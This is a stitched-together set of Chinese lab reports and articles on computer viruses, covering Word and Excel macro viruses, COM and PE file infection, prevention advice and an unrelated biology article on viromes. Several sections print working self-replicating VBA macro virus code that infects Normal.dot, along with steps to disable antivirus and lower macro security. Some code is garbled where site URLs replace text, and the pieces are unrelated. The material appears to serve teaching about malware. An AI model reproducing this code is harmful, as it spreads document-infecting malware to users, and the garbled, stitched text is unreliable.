计算机病毒实验之宏病毒

计算机病毒实验报告

实验3.2 台湾No.1宏病毒

3.2 台湾No.1宏病毒

3.2.1 实验目的

了解台湾No.1宏病毒的基本概念

实验自己的台湾No.1宏病毒

3.2.2 实验原理

台湾No.1宏病毒实际上是一个含有恶意代码的Word自动宏，其代码主要是造成恶作剧，并且有可能使用户计算机因为使用资源枯竭而瘫痪。

3.2.3 实验预备知识点】

什么是Word宏

对VBA语言有一定的了解

3.2.4 实验环境

操作系统：WINDOWS2000

JDK版本：Java Standard Edition 1.4.0以上

数据库：Mysql

Web服务器:Tomacat

Office版本:MS office2000/2003

3.2.5 实验步骤

打开“信息安全综合实验系统” 在右上角选择“实验导航”双击“病毒教学实验系统”进入病毒

教学实验系统登录面界，输入用户名和密码。（注意：实验前先关闭所有杀毒软件。）

1.病毒感染实验

由于该病毒特征码明显，因此请首先将病毒防火墙关闭，将系统时间调整到13日。

进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“病毒感染实验”，要根据要求和提示操作配置客户端的邮件地址，如下图3-2-1所示。根据提示下载提供的台湾No.1病毒，亲自运行并记录自己的实验报告。

图3-2-1 病毒样本下载页面

2.病毒代码分析

进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“病毒代码分析”，可以分析页面中的台湾No.1病毒源代码，根据相关代码分析，填写页面中空白的参数，点击确定系统将自动生成代码。新建一个word文档作为自己编写的该病毒文件，然后把生成的代码复制并粘帖至Word自带的VBA编译工具中，可以参照美丽莎宏病毒实验中的图4-3至4-4 。将自行编制的病毒备份待用。

3.杀毒实验

进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“杀毒实验”，学习病毒防范方法，根据系统页面上的提示，使用手动杀毒，并写入实验报告中。

运行步骤3中编制的病毒，并使用步骤4中提到的方法清除病毒的危害。

3.2.6 实验思考

1台湾No.1宏病毒的主要特征是什么？是如何传播的？

2台湾No.1宏病毒有没有变种？举出2个例子，并简单描述他们的特征。

3比较美丽莎宏病毒和台湾No.1宏病毒，分析他们的相同点与区别。

答：1 出现连计算机都难以计算的数学乘法题目，并要求输入正确答案,一旦答错，则立即自动开启20个文件文件,并继续出下一道题目。一直到耗尽系统资源为止。

将自己隐藏在word文档中，打开这个文档即被执行，然后拷贝到全局宏的区域，使得所有打开的文档都可以使用这个宏。

答：2有

答：3梅丽莎病毒一般通过邮件传播，邮件的标题通常为“这是给你的资料，不要让任何人看见”。一旦收件人打开邮件，病毒就会自动向用户通讯录的前50位好友复制发送同样的邮

Kwyjibo”，则用Outlook 给地址簿中前50 个联系人发E-mail，其主题为“Important Message From XXX”(XXX 为用户名)，内容为“Here is that document you asked for ... don't show anyone else ;-)”，附件为当前被感染的文档；将注册表中“HKEY_CURRENT_USER\Software\Microsoft\Office\”目录下Melissa 的值设置为“... by Kwyjibo”。如果当前日期数和当前时间的分钟数相同时，则在文档中输出以下内容“ Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's ov er. I'm outta here.”

Taiwan NO.1 文件宏病毒- 数学能力大考验

发病日：每月13日

病征：出现连计算机都难以计算的数学乘法题目，并要求输入正确答案,一旦答错，则立即自动开启20个文件文件,并继续出下一道题目。一直到耗尽系统资源为止。

Word宏病毒

Word宏病毒 1.实验目的(后果自负) Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。 2.实验所需条件和环境 硬件设备：局域网，终端PC机。 系统软件：Windows系列操作系统 支撑软件：Word 2003 软件设置：关闭杀毒软；打开Word 2003，在工具→宏→安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问 实验环境配置如下图所示： 受感染终端 受感染 Word文档 被感染终端宏病毒传播示意图 3.实验内容和分析 为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过

多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。 3.1. 例1 自我复制，感染word公用模板和当前文档 代码如下： 'Micro-Virus Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.SaveNormalPrompt = False Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With Host If .Lines(1.1) <> "'Micro-Virus" Then .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode .ReplaceLine 2, "Sub Document_Close()" If ThisDocument = nomaltemplate Then .ReplaceLine 2, "Sub Document_Open()" ActiveDocument.SaveAs ActiveDocument.FullName End If End If End With MsgBox "MicroVirus by Content Security Lab" End Sub 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具→宏→Visual Basic→宏编辑器）,在左侧的project—>Microsoft Word对象→ThisDocument中输入以上代码，保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。 3.1.1.代码解释 以上代码的基本执行流程如下： 1)进行必要的自我保护 Application.DisplayStatusBar = False Options.SaveNormalPrompt = False 高明的病毒编写者其自我保护将做得非常好，可以使word的一些工具栏失效，例如将

宏病毒分析及清除实验

实验五宏病毒分析及清除实验 姓名：xxx 学号：xxxxxxxx 日期：2014年4月26日 专业：计算机科学与技术 一、实验目的 ?了解“宏病毒”机理； ?掌握清除宏病毒的方法； ?掌握采用“宏”和脚本语言进行编程的技术。 二、实验环境 ?Windows2003操作系统； ?Office Word2003字处理软件。 三、实验内容 1．软件设置 关闭杀毒软件；打开Word字处理软件，在工具“宏”的“安全性”中，将“安全级”设置为低，在“可靠发行商”选项卡中，选择信任任何所有安装的加载项和模板，选择“信任visual basic项目的访问”。 注意：为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。 2．自我复制功能演示 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具“宏”“Visual Basic宏编辑器”）,在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码（Macro-1），保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。 完整代码如下：

清除宏病毒

清除宏病毒，名字是：StartUp.xls方法 --大白菜 文中图片都很小，看不清楚，可以用以下快捷方式：按住ctrl 向上滚动鼠标滑轮可以放大word，就可以看清楚图片了 病毒样本如下：（下面是宏病毒代码，电脑知识欠缺的，千万被乱动哦，小心弄巧成拙） Vba代码 =================宏病毒代码复制从下一行开始================= Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = https://www.360docs.net/doc/a8833481.html, ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = https://www.360docs.net/doc/a8833481.html,

第一组COM病毒实验报告

COM病毒实验报告 我们小组已经成功的实现了COM病毒感染实验。 在整个实验过程中，由于是初次配置Dos环境，我们遇到了很多问题，也花了很多时间去解决问题，因此，我们在此写出我们整个配置过程的主要步骤及其遇到的问题。 一．配置MS-Dos 1. 新建一个虚拟机 2. 用虚拟机的软驱载入，安装程序的第一个镜像 DOS71_1.IMG （在安装时设备里面没有floppy时只需add一下就好，选择物理软盘驱动器） 3．此时MS-DOS虚拟机处于半安装状态，然后开始命令配置 先创建一个文件夹tmp md tmp 复制软盘A的文件到C copy A:\ C:\tmp 关机 shutdown -s 4.用虚拟机的软驱载入安装程序的第二个镜像 DOS71_2.IMG 复制软盘A的文件到C copy A:\ C:\tmp 5.开始配置 先进入到tmp文件夹下 运行setup.bat (在此运行过程中，出现死机，原因不明，最后通过重启解决此问题) 6. 然后一路next和ok完成配置 二．安装MASM611 1.下载MASM611（里面包括5个DISK） 2.在虚拟机里面通过映射到磁盘（我们所做实验为Z盘），在映射过程中，特别注意把只读属性去掉，然后把下载的MASM611拷贝到此磁盘 3.打开MS-DOS系统，进入到MASM611下的DISK1文件目录下 4.开始安装 运行命令 setup.exe 5.在安装过程中，特别注意在第二次选项时应选择MS-DOS/Microsoft

Windows,否则无法使用link链接命令 6.其它一律按默认值点击确定，安装成功 三．实验过程 1.在使用MASM611前，应在MASM611目录下进行路径的配置（这点要特别注意） 路径配置命令 set PATH=C:\DOS71;..;C:\MASM611\BIN; 2.编译链接test文件（test文件是正常文件），在此实验中，链接后需要把test.exe改为https://www.360docs.net/doc/a8833481.html,文件 编译test文件时出错 unmatched block nesting:main(解决方法：在test 文件中加入一句与main匹配的代码main endp) 3.运行test文件(命令为https://www.360docs.net/doc/a8833481.html,),运行成功，显示字符串：This a simple com program for a test 4.编译链接virus文件（virus文件为病毒）,此时virus.exe文件已经生成 编译virus文件时出错 invalid character in file（解决方法：在相应的出错处加上分号;） 6.新建一个文件del.txt 命令 echo aaa >del.txt 7.查看MASM611下的文件目录，此时可以看到del.txt文件 8.运行virus.exe，成功后出现字符串 You are infected by a simple com virus，（但在运行该命令时，系统有时会死机，原因不明，最后解决方法，强制关掉MS-DOS系统后重新启动） 9.然后运行https://www.360docs.net/doc/a8833481.html,，此时运行结果为 You are infected by a simple com virus 以及相关的乱码等等 10.此时在MASM611目录下查找刚刚新建的文件del.txt,可以发现del.txt不 见了,并且https://www.360docs.net/doc/a8833481.html,文件变大 11.实验结束，病毒virus文件成功感染test文件

实验三 脚本病毒和宏病毒分析

实验三脚本病毒和宏病毒分析 一、实验目的 通过这项实验旨在使学生掌握Office下宏病毒的基本原理，主要包括它的传染机制、破坏机制以及怎样清除Office下的宏病毒。 二、实验环境 操作系统环境：Windows98/NT/2000/XP 编程环境：Office VBA 三、实验基础知识要求 Office VBA编程环境 四、实验任务 1．任务性质：验证性实验 2．任务描述：下面的示例中给出的是一个Word宏病毒的示例程序（只有传染模块），仔细阅读源程序，掌握Word宏病毒的传染过程。 3．任务步骤： （1）打开Word2000，新建一个文档名为“test”； （2）点击“工具－宏－宏”，在对话框“宏的位置”选择“test”，在宏名中输入“autoclose”，然后点击“创建”按钮； （3）在VBA编辑环境中输入示例程序中给出的代码，并保存，然后退出VBA； （4）点击“工具－宏－宏”，在对话框中点击“管理器”按钮，在管理器对话框中点击“宏方案项”标签；在宏方案项有效范围的“test.doc”中将“NewMacros”改名为“AOPEDMOK”； （5）点击“工具－宏－安全性”，在安全性对话框中的安全级标签中选择“低”，在可靠性来源标签中选择“信任对VB项目的访问”； （6）保存并关闭“test”文档； （7）新建一个文档test1，关闭后重新打开，观察test1是否被感染。 （8）清除此宏病毒，即要同时删除normal模板、所有活动模板、和染毒文件的autoclose 宏。 4．示例程序 Sub autoclose() ' autoclose Macro ' 宏在2005-8-26 由jingjd 创建 On Error Resume Next Application.DisplayAlerts = wdAlertsNone Application.EnableCancelKey = wdCancelDisabled Application.DisplayStatusBar = False 'Options.VirusProtection = False Options.SaveNormalPrompt = False Const VirusName = "AOPEDMOK" 'MsgBox ActiveDocument.VBProject.VBComponents.Item(2).Name 'MsgBox ActiveDocument.VBProject.VBComponents(2).Name Set Doc = ActiveDocument.VBProject.VBComponents Set Tmp = NormalTemplate.VBProject.VBComponents Const ExportSource = "E:\aopedmok.txt" For j = 1 To Doc.Count

计算机病毒的防范的实验报告

计算机病毒的防范 随着计算机及计算机网络的发展，伴随而来的计算机病毒传播问题越来越引起人们的关注。随因特网的流行，有些计算机病毒借助网络爆发流行，如CIH计算机病毒、“爱虫”病毒等，它们与以往的计算机病毒相比具有一些新的特点，给广大计算机用户带来了极大的损失。 当计算机系统或文件染有计算机病毒时，需要检测和消除。但是，计算机病毒一旦破坏了没有副本的文件，便无法医治。隐性计算机病毒和多态性计算机病毒更使人难以检测。在与计算机病毒的对抗中，如果能采取有效的防范措施，就能使系统不染毒，或者染毒后能减少损失。 计算机病毒防范，是指通过建立合理的计算机病毒防范体系和制度，及时发现计算机病毒侵入，并采取有效的手段阻止计算机病毒的传播和破坏，恢复受影响的计算机系统和数据。 计算机病毒利用读写文件能进行感染，利用驻留内存、截取中断向量等方式能进行传染和破坏。预防计算机病毒就是要监视、跟踪系统内类似的操作，提供对系统的保护，最大限度地避免各种计算机病毒的传染破坏。 计算机病毒的工作方式是可以分类的，防杀计算机病毒软件就是针对已归纳总结出的这几类计算机病毒工作方式来进行防范的。当被分析过的已知计算机病毒出现时，由于其工作方式早已被记录在案，防杀计算机病毒软件能识别出来；当未曾被分析过的计算机病毒出现时，如果其工作方式仍可被归入已知的工作方式，则这种计算机病毒能被反病毒软件所捕获。这也就是采取积极防御措施的计算机病毒防范方法优越于传统方法的地方。 计算机病毒防范工作，首先是防范体系的建设和制度的建立。没有一个完善的防范体系，一切防范措施都将滞后于计算机病毒的危害。 计算机病毒防范体系的建设是一个社会性的工作，不是一两个人、一两家企业能够实现的，需要全社会的参与，充分利用所有能够利用的资源，形成广泛的、全社会的计算机病毒防范体系网络。 一.计算机病毒的技术预防措施 下面总结出一系列行之有效的措施供参考。 1、新购置的计算机硬软件系统的测试 新购置的计算机是有可能携带计算机病毒的。因此，在条件许可的情况下，要用检测计算机病毒软件检查已知计算机病毒，用人工检测方法检查未知计算机病毒，并经过证实没有计算机病毒感染和破坏迹象后再使用。

令人心烦的excel宏病毒终于清除了-推荐下载

令人心烦的excel宏病毒终于清除了!我如释重负地吁了口气，脑子一下子轻松了许多。你可能不知道，为了清除这个excel宏病毒，几天来，搞得我头昏脑胀。 大约两三个星期前，同事罗某告诉我，下面报上来的excel表，打开后出现了奇怪的现象：会自动打开一个book1的电子表格。他让我帮忙解决一下。我初步判断是宏病毒，默认打开的book1可能是excel的模板。我先“另存为”文件，找到book1的位置，删掉。同时把excel的宏安全性设置为高，禁止运行来历不明的宏，问题即解决了。 恰巧到下面去检查工作，某单位反映，电脑中病毒了，所以没有及时交表格。一问情况，与罗某讲的情况一样。我主动表示去“搞搞看”。但是情况并非如我猜想的那样。情况是：如果将宏的安全性设为非常高，禁用宏，会弹出一个警告：“出现了一个不能被禁止、又无法签署的Microsoft Excel 4.0 宏”，该表打不开；如果要打开这个表，必须降低excel宏安全性等级，将它设为中或低，即运行宏病毒，但又多出了一个book1表。即使将book1删除，仍然不行。面对这个新病毒，当时我不知该怎么办。 没过两天，罗某又来找我，说又出现了一种现象。我去看了，正与上次在下面检查时看到了excel 4.0 宏病毒一模一样。而且，下面有几个单位都说出现了宏病毒，上报来的表格中都有上面讲的问题。而且办公室有三台电脑都感染了excel 4.0 宏病毒。这么多的电脑感染了，引起了我的兴趣。

以前，我的电脑也多次中过病毒。我一般的做法就是上网查找 资料，把几篇文章介绍的方法结合起来，多试几次，几乎都能解决。可是这一次，情况完全不同。上网查了多次，讲宏病毒的文章特别多，但是介绍杀除方法的极少，而专门针对Microsoft Excel 4.0 宏病毒的只有一两篇提问的贴子，所介绍的方法就两样，一是在Excel 2003中禁止宏，二是用杀毒软件。第一种禁止是不行的，第二种杀毒软件我用了小红伞、360安全卫士，没查出病毒。 除此之外，还有一种临时救急的方法是：打开病毒表格，复制，再新建一个表格，选择性粘贴，只选值，最后保存。这个办法虽然行，但是面对那么多有宏病毒的表格，一个一个打开、复制、选择 性粘贴是不现实的。怎么办呢？ 接下来，我的思路是选择一种不支持excel宏的电子表格软件，这 样也许就把宏病毒过滤了。我试验过的软件有：wps office 2003 到最新的2010版，Ashampoo Office 2010，OpenOffice 3.2，永中Office 2009。它们都提示发现了宏，有的说不支持，有的说可以禁用，重新保存后宏病毒仍然存在，要么再打开时软件死机。 但是试验中发现微软Office 2007 / 2010 Beta 可以打开表格，只是在菜单栏提示“禁止了宏”，不影响操作。然而，现在基层单 位的电脑配置都比较低，安装不了Office 2007 / 2010 Beta，再说Office 2007 / 2010 Beta的菜单怪怪的，很多人不习惯。最重要的是，这并没有从根本上解决问题，宏病毒依然在表格文件里。 有个单位的人对我说，他们请来了电脑公司人员，几个小青年，把

宏病毒实验报告

宏病毒实验报告 2 邹文敏 一、实验目的 通过运行计算机代码，更加深刻的理解计算机代码。对计算机代码有一个初步的认识。 加深对宏病毒的感性认识，宏病毒是感染数据文件word,office 等。 二、实验内容 运行自我复制，感染word公用模板和当前文档；具有一定破坏性的宏；清除宏病毒。 三、实验步骤 实验一： 将word文档中的开发者工具打开；word 中心→信任选项→宏设计将信任选项打开

运行第一个实验Visual Basic →normal →Microsoft→the document Project→microsoft word对象→the document复制如下代码：'APMP Private Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.VirusProtection = False Options.SaveNormalPrompt = False '以上都是基本的自我隐藏措施 MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines( 1, 20) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then _ Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule

word宏恶意代码实验

计算机宏病毒分析 一、实验目的 ?了解“宏病毒”机理； ?掌握清除宏病毒的方法； ?掌握采用“宏”和脚本语言进行编程的技术。 二、实验环境 ?Windows 7 64位旗舰版 ?Office Word2010字处理软件。 三、实验要求 ?宏的编写； ?理解宏病毒的作用机制。 四、实验步骤： 1．软件设置 关闭杀毒软件；打开Word字处理软件，在工具“宏”的“安全性”中，将“安全级”设置为低，在“可靠发行商”选项卡中，选择信任任何所有安装的加载项和模板，选择“信任visual basic项目的访问”。 注意：为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。 2．自我复制功能演示 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具“宏”“Visual Basic宏编辑器”）,在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码（Macro-1），保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word 文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。 完整代码如下： 'Macro-1：Micro-Virus

GF宏病毒

西安邮电大学 通信与信息工程学院 网络攻防实验报告 专业班级： 学生姓名： 学号(班内序号): 2014 年 5 月 28 日 —————————————————————————— 装 订 线———————————————————————————————— 报告份数：

实验宏病毒 1.场景描述 在虚拟机中演示word宏病毒的发生机制，以及如何清除病毒的一系列操作。宏病毒样本：自我复制及感染病毒(copy.txt) 类台湾一号病毒(No1.txt) 备注：实验工具（D盘-->攻防工具包-->宏病毒：Copy.txt、TaiWanNo1.txt） 2.实验目的 （1）演示宏的编写 （2）说明宏的原理及其安全漏洞和缺陷 （3）理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识 3.需求分析 宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。 因为Microsoft Word几乎已经成为目前全世界办公文档的事实工业标准，其影响是全球范围的。Word文件的交换是目前办公室数据交流和传送的最通常的方式之一，而且该病毒能跨越多种平台，并且针对数据文档进行破坏，因此具有极大地危害性。所以，必须要掌握如何预防和清除宏病毒，让损失减少。 4.技术分析 Word的文件建立是通过模板来创建的，模板是为了形成最终文档而提供的特殊文档，模板可以包括以下几个元素： 菜单、宏、格式（如备忘录等）。模板是文本、图形和格式编排的蓝图，对于某一类型的所有文档来说，文本、图像 和格式编排都是类似的。 Word提供了几种常见文档类型的模板，如备忘录、报告和商务信件。您可以直接使用模板来创建新文档，或者加 以修改，也可以创建自己的模板。一般情况下，Word自动将新文档基于缺省的公用模板（Normal.dot）。 可以看出，模板在建立整个文档中所起的作用，作为基类，文档继承模板的属性，包括宏、菜单、格式等。 Word处理文档需要同时进行各种不同的动作，如打开文件、关闭文件、读取数据资料以及储存和打印等等。每一 种动作其实都对应着特定的宏命令，如存文件与FileSave相对应、改名存文

计算机病毒实验报告

计算机病毒实验报告 ——windows病毒实验 姓名：张艳秋 学号：081300607 班级：信安0802 指导老师：韦俊银 实验日期：2011.5.27

实验内容 1．PE文件感染实验（选） 2．暴风一号病毒 3．VBS病毒产生 4．宏病毒实验（选）

PE文件感染实验 实验目的 了解pe病毒的感染过程 实验环境 硬件设备 PC机一台（建议虚拟机） 软件工具 Office Word 2007 实验步骤 一：参照病毒感染PE文件的7个步骤，记录病毒是如何感染文件（文字和截屏形式） 病毒感染文件过程(以感染文件ebookcode.exe为例)： 重定位，获得所有API地址： …… 通过软件Stud_PE可查看可执行文件ebookcode.exe的结构可查看文件内容： 1．判断目标文件开始的两个字节是否为“MZ”：

2．判断PE文件标记“PE”： 3．判断感染标记，如果已被感染过则跳出继续执行宿主程序，否则继续： 4．读取IMAGE_FILE_HEADER的NumberOfSections域，获得Data Directory （数据目录）的个数，（每个数据目录信息占8个字节）： 5．得到节表起始位置。(数据目录的偏移地址+数据目录占用的字节数=节表起始位置)：

6．得到节表的末尾偏移（紧接其后用于写入一个新的病毒节信息）节表起始位置+节的个数*(每个节表占用的字节数28H)=节表的末尾偏移 7．开始写入节表,感染文件： 二：在掌握Stud_PE工具的基础上，比较文件感染前后有哪些变化。 感染前：

感染后： 由上两图可以看出，感染前后有4处发生了变化： 1：PE文件头中入口点： 感染病毒后ebookedit.exe程序的入口点变成了病毒文件的入口点 2：PointerToRawData域值，即该文件的偏移量发生了变化； 3：imag的大小发生了变化； 4：sections的数量发生了变化。 由.exe文件感染前后变化可知，PE病毒感染过程即在文件中添加一个新节，

病毒与宏病毒全面解读

病毒与宏病毒全面解读 美格基因姜敬哲 病毒知多少？ 提起病毒，人们想到的通常是SARS、埃博拉、艾滋、流感等这些令人不愉快的词汇。事实上，病毒不仅仅影响人的健康，它们还有更重要的使命：推动自然物种的更替与演化，驱动生物地球化学的循环（Suttle等，2005）。 世上丰度最高的类群 病毒是我们这个星球上丰度最高的生命体。它们存在于世界的任意角落：从体型硕大的蓝鲸、非洲象，到肉眼无法分辨的寄生虫、细菌、衣原体等，但凡是“活”的东西，都有专门负责“办”它的病毒。

图1 常见感染人体的病毒形状和大小 科学研究中的暗物质 据推测，地球上的病毒种类多达8700万种，其中可能感染人类的病毒就有73万种，但目前比较确认的已知病毒却只有约5000种，已知的人类病毒仅有263种（Geoghegan 等，2017；Carroll 等，2018）。由此可见，病毒是生命科学研究中实打实的“暗物质”。 图2 目前地球上已知和未知的病毒物种数量

宏病毒组 病毒和细菌不同，不同病毒基因组的差异非常大，根本没有16S rDNA这种进化保守的基因，所以无法做扩增子（Amplicon）。 2002 年，Forest Rowher课题组基于宏基因组（Metagenome）研究思路，对海水中的病毒进行了富集，高通量测序后发现大量的未知病毒（Breitbart等，2002）。自此，宏病毒组（Virome）概念应运而生（即，组成一个特定生态系统或共生系统中所有病毒的集合）。 2018 年，由包括我国高福院士在内的多位世界级病毒专家在Science杂志上联合刊文，提出“全球病毒组计划”（GVP）（Carroll等，2018），将宏病毒组研究推到了一个全新的高度。 CNS中的常客 近几年，科学家运用宏病毒组学技术对多种环境、动物、微生物、以及人类各种来源的样品进行了不少的研究，产生很多突破性成果，见刊CNS已成为常态。代表作如，美国能源部的联合基因组研究所（JGI）针对全球3042份各种来源的样品进行的病毒组分析，共获得超过125 000个DNA病毒的基因组序列，将已知病毒基因集扩大16倍（Paez-Espino等，2016）。 在病毒组领域，中国科学家在其中也扮演了重要角色。2016和2018年，Nature 杂志两次报道了我国科学家张永振团队的关于无脊椎动物和脊椎动物病毒组的研究成果。他们对388种无脊椎和低等脊椎动物样品进行了大规模的转录组测序，鉴定出1659种RNA病毒，其中绝大多数为首次发现（Shi等，2016和2018，图3）。该研究的意义在于，彻底重新构建了RNA病毒世界的系统发育树，对RNA 病毒的分类进行了全新的界定。

一个简单宏病毒的感染与清楚

宏病毒实验 1. 实验目的 （1）理解宏病毒的概念、病毒机制、传播手段以及预防措施。 （2）观察一个简单宏病毒感染计算机后的现象，并寻找清除病毒的方法。 2. 实验原理 宏（Macro）是微软公司出品的Office软件包中所包含的一项特殊功能。微软公司设计此项功能的主要目的是给用户自动执行一些重复性的工作提供方便。它利用简单的语法，把常用的动作写成宏，用户工作时就可以直接利用事先编写好的宏自动运行，以完成某项特定的任务，而不必反复重复相同的工作。微软的Word Visual Basic for Application(VBA)是宏语言的标准。宏病毒正是利用Word VBA 编写的一些宏，是一种寄存在文档或模板中的计算机病毒。一旦打开含有宏病毒的文档，其中的宏就会执行，宏病毒被激活，转移到计算机中并驻留在Normal 模板上。以后所有自动保存的文档都会感染上这种宏病毒。 预防宏病毒有以下几种基本的方法： （1）防止执行自动宏：可以通过在DOS提示符下输入指令”WinWord.exe /m DisableAutoMacro”来防止打开Word文档时执行自动宏。另外，在打开或关闭文档时按下Shift键可以使文档不执行任何自动宏。 （2）保护Normal模板：可以采取以下几种方法对Normal模板进行保护。提示保存Normal模板；设置Normal模板的只读属性；设置密码保护；设置安全级别；按照自己的习惯设置Normal模板并进行备份，当被病毒感染时，使用备份模板覆盖当前模板。 （3）使用DisableAutoMacro功能。 3. 实验环境 虚拟机下Windows server 2003 4. 实验内容 本实验拟在虚拟机下感染一个简单的宏病毒，然后观察病毒对计算机有什么影响，最后寻求清除方法。

20112529徐文锋-计算机病毒实验报告

计算机与信息学院 《计算机病毒与反病毒》 课程作业 学生姓名：徐文锋 学号：20112529 专业班级：计算机11-3班 2014 年06 月24 日

说明 1．本课程作业报告是《计算机病毒与反病毒》课程成绩评定的重要依据，须认真完成。 2．报告内容严禁出现雷同，每位同学须独立完成。若发现抄袭，抄袭者和被抄 ．．．．．．．．．．．． 袭者本课程的成绩均以零分 ．．．．．．．．．．．．计．。 3．要排版，格式应规范，截图一律采用JPG格式（非BMP格式）。为避免抄袭，用图像编辑软件在截图右下角“嵌入”自己的学号或姓名。实验报告的格式是否规范、截图是否嵌入了自己的学号或姓名，是评价报告质量的考量因素。4．说明文字与实验截图相配合，若只有说明文字，或只有截图，则成绩为不及格。 5．只提交报告电子版。在规定的日期内，通过电子邮件发送到hfutZRB@https://www.360docs.net/doc/a8833481.html,，若三天之内没有收到内容为“已收到”的回复确认Email，请再次发送或电话联系任课老师。 6．为了便于归档，实验报告Word文档的命名方式是“学号姓名-计算机病毒实验报告.doc”，如“201112345张三-计算机病毒课程报告.doc”。 注意：提交报告截止日期以QQ群通知时间为准(一般在考试周下周周三)，若因没有及时提交实验报告，导致课程成绩为“缺考”的，责任自负。

实验一程序的自动启动 一、实验目的 （1）验证利用注册表特殊键值自动启动程序的方法； （2）检查和熟悉杀毒软件各组成部分的自动启动方法。 二、实验内容与要求 （1）在注册表自动加载程序主键中，添加加载目标程序键值（自己指派任意程序），重启操作系统，检查是否能自动成功加载目标程序。罗列5或5个以上能自动启动目标程序的键值，并用其中某一个启动自己指派的程序。 （2）检查/分析你所使用的计算机中杀毒软件系统托盘程序、底层驱动程序等组成部分的自动启动方式。 三、实验环境与工具 操作系统：Windows XP/Windows Vista/Windows 7 工具软件：RegEdit.exe，AutoRuns，或其他注册表工具软件；杀毒软件四、实验步骤与实验结果 一）按启动文件夹的方法 1、“启动”文件夹是最常见的自启动文件夹。可以打开“开始”菜单—>“所有程序”，在所有程序里面可以找到“启动”文件夹 找到“启动”文件夹的位置，在其中加入WPS的word的快捷方式，就可以在电脑开机时自启动word了

宏病毒深入分析

宏病毒的深入分析 OFFICE给用户提供了用于创建专业而优雅的文档,表格等工具，帮助用户节省时间，并得到优雅美观的结果，在当前使用中是占有巨大优势的文字，数据处理器。它为我们的办公提供了极大的便利.OFFICE为了方便客户，提供了宏这样一个功能。宏就是能组织到一起作为一独立的命令使用的一系列命令，它能使日常工作变得更容易，一般说来，宏是一种规则或模式，或称语法替换，用于说明某一特定输入（通常是字符串）如何根据预定义的规则转换成对应的输出（通常也是字符串)。这种替换在预编译时进行，称作宏展开。通俗的来说，客户事先设置好宏，需要时就可以批量使用，而不必重复操作。然而宏也是一把双刃剑，它在让客户享受便利的同时，同时也为黑客留下了漏洞，这就是今天要分析的宏病毒。 宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。word宏病毒通过．DOC文档及．DOT模板进行自我复制及传播，而计算机文档是交流最广的文件类型。多年来，人们大多重视保护自己 计算机的引导部分和可执行文件不被病毒感染，而对外来的文档文件基本是直接浏览使用，这给Word 